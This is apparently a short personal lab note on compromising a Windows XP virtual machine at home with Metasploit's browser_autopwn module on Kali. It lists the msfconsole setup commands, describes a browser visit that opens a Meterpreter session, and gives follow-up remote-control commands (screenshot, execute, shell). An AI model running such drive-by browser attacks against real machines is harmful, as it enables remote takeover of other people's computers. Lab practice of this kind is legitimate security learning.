(Auto)pwning XP with Kali

Grok time ~1 minute

Just some quick notes on exploiting a Windows XP VM at home.

I booted WinXP SP3 in a VMWare VM with VMWare Player and set the network to bridge (not auto-bridging). Next, select the network device: Virtual Box Host Adapter if you want your VirtualBox VMs to talk to the VMWare one or your regular NIC for your home/local network. Wait to get an IP. I had some issues and had to “disconnect” the NIC in VMWare and reconnect. Check here if you need some help for the network setup.

In the msfconsole, this is how we’ll set up the autopwn:

msfconsole
msf> user auxiliary/server/browser_autopwn
msf> set LHOST <local IP>
msf> set URIPATH /
msf> set SRVPORT 80

Then visit <local IP> (the IP of your Kali box) in IE and see what happens. I was prompted to install/run an ActiveX control. That required that I download/install Java. I got prompted for an update but denied it. Metasploit opened a Meterpreter session on the Kali box.

Type sessions to see what meterpreter sessions are available (there will be no msf> prompt).

sessions -i # drops to an interactive meterpreter shell with the machine

screenshot captures a screencap and saves it to your home directory (type display [filename] to see it)

execute -f explorer will open an explorer window on the XP machine

Type help to see all the options. Like shell to drop into a CMD shell on the box. To get out of it, just type exit and you’ll return to the meterpreter shell.